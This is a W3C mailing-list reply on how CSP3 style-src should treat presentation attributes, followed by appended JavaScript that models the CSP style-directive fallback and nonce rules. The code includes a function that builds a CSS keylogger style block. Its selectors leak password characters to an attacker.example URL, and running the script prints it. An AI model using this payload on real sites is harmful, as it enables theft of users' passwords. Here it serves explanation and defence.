Re: [CSP3] "style-src 'none';" and presentation hints/mapped attributes

On Wed, Oct 3, 2018 at 1:11 PM Jonathan Watt <jwatt@jwatt.org> wrote:

> I don't see much previous discussion (only [1]) about attributes that are
> treated as presentation hints and mapped into style[2][3] and how they
> should be treated when the 'style' attribute is blocked.
>
> It would seem to make sense to block mapped attributes in this case for
> HTML, but it would break most SVG content.
>

Conceptually, treating presentation attributes as styles makes sense to me
and I wouldn't expect a lot of breakage as a result of doing so, given that
most applications which define style-src set 'unsafe-inline' because inline
style attributes are extremely common.

When it comes to the security value, I'm a little skeptical about this
providing useful protections against attackers with an HTML injection. CSP
can't prevent an attacker from drawing arbitrary pixels on the screen --
e.g. via a <table> with cells using different bgcolor values, or, more
realistically, by reusing existing ids/classes which get styled according
to the application's existing CSS rules.

Overall, my guess is that if we're focusing on the practical anti-XSS
benefits of CSP, we might not gain very much from making style-src apply to
these SVG attributes. Rather, I expect that the CSP3 style-src-{elem,attr}
<https://www.chromestatus.com/feature/5141352765456384> directives will
allow developers to enforce restrictions on the more dangerous CSS
functionality (require nonces/hashes for <style> blocks to restrict the use
of selectors, which enable e.g. the "CSS keylogger" attack) but still allow
inline style attributes to reduce the amount of changes developers need to
make to their HTML.

Cheers,
-Artur

1. https://lists.w3.org/Archives/Public/public-webappsec/2012Nov/0019.html
> 2. https://html.spec.whatwg.org/#the-css-user-agent-style-sheet-and-presentational-hints
> 3. https://svgwg.org/svg2-draft/single-page.html#attindex-PresentationAttributes

Received on Wednesday, 3 October 2018 12:52:48 UTC
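The following is an added example, not part of the thread above nor of any browser's implementation. It models the CSP3 decision that Artur's reply relies on: `style-src-elem` governs `<style>` blocks and falls back to `style-src` and then `default-src`, `style-src-attr` does the same for `style=""` attributes, a nonce can only satisfy an element, and `'unsafe-inline'` is ignored once the governing list carries a nonce or hash source. Presentation hints (`bgcolor`, SVG `fill`, ...) are modelled as outside the decision entirely, which is the gap Jonathan raised. Hash sources and `'unsafe-hashes'` are not modelled; the policy strings, the nonce `r4nd0m` and the `attacker.example` URL are constructed for illustration.

```javascript
'use strict';

// Parse a Content-Security-Policy header value into { directiveName: [values] }.
function parsePolicy(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    policy[name.toLowerCase()] = values;
  }
  return policy;
}

// CSP3 fallback chain: the element/attribute-specific directive wins; when it
// is absent the check falls back to style-src, then to default-src.
function governingDirective(policy, kind) {
  const specific = kind === 'elem' ? 'style-src-elem' : 'style-src-attr';
  for (const name of [specific, 'style-src', 'default-src']) {
    if (Object.prototype.hasOwnProperty.call(policy, name)) {
      return { name, values: policy[name] };
    }
  }
  return null; // no applicable directive: nothing is restricted
}

// use.kind: 'elem' for a <style> block, 'attr' for a style="..." attribute,
// 'presentation' for a mapped attribute (bgcolor, width, SVG fill, ...).
// use.nonce: nonce carried by the <style> element, if any.
function allowsInlineStyle(policy, use) {
  if (use.kind === 'presentation') {
    // Presentation hints are mapped through the UA style sheet rather than
    // treated as inline styles, so style-src is never consulted for them.
    return { allowed: true, reason: 'presentation hints are not governed by style-src' };
  }
  const directive = governingDirective(policy, use.kind);
  if (directive === null) {
    return { allowed: true, reason: 'no style directive in policy' };
  }
  const { name, values } = directive;
  const keywords = new Set(values.map((v) => v.toLowerCase())); // keywords are case-insensitive
  if (keywords.has("'none'")) {
    return { allowed: false, reason: `${name} is 'none'` };
  }
  // A nonce can only match an element; a style attribute has nowhere to carry one.
  if (use.kind === 'elem' && use.nonce && values.includes(`'nonce-${use.nonce}'`)) {
    return { allowed: true, reason: `${name} nonce matched` };
  }
  // CSP3: 'unsafe-inline' is ignored when the list also has a nonce or hash source.
  const hasNonceOrHash = values.some((v) => /^'(nonce|sha(256|384|512))-/i.test(v));
  if (keywords.has("'unsafe-inline'") && !hasNonceOrHash) {
    return { allowed: true, reason: `${name} allows 'unsafe-inline'` };
  }
  return { allowed: false, reason: `${name} does not allow this inline style` };
}

// Three constructed policies matching the positions in the discussion.
const POLICIES = {
  blockAll: "style-src 'none'",
  // What most deployments do today: inline styles everywhere.
  inlineEverywhere: "default-src 'self'; style-src 'unsafe-inline'",
  // The CSP3 split: nonce-gated <style> blocks, style attributes still allowed.
  split: "style-src-elem 'nonce-r4nd0m'; style-src-attr 'unsafe-inline'",
};

// The shape of the "CSS keylogger" <style> block: one selector per character
// that matches a password field whose reflected value ends in that character
// and loads a distinct URL. It needs a selector, which a style attribute can
// never express; that is why nonce-gating <style> blocks is the interesting
// control. Only works where the page mirrors input into the value attribute.
function keyloggerStyleBlock(chars, exfilBase) {
  return chars
    .map((c) => `input[type="password"][value$="${c}"]{background-image:url("${exfilBase}/${encodeURIComponent(c)}")}`)
    .join('\n');
}

// Evaluate every kind of inline style use under every policy.
function evaluateAll() {
  const uses = {
    styleElement: { kind: 'elem' },
    noncedStyleElement: { kind: 'elem', nonce: 'r4nd0m' },
    styleAttribute: { kind: 'attr' },
    bgcolorAttribute: { kind: 'presentation' },
  };
  const result = {};
  for (const [policyName, header] of Object.entries(POLICIES)) {
    const policy = parsePolicy(header);
    result[policyName] = {};
    for (const [useName, use] of Object.entries(uses)) {
      result[policyName][useName] = allowsInlineStyle(policy, use).allowed;
    }
  }
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(evaluateAll(), null, 2));
  console.log(keyloggerStyleBlock(['a', 'b'], 'https://attacker.example'));
}
```

Under the `split` policy the injected keylogger block (no nonce) is refused while `style=""` attributes keep working, which is the trade-off the reply describes; under all three policies the `bgcolor` row stays allowed, which is the question the thread leaves open.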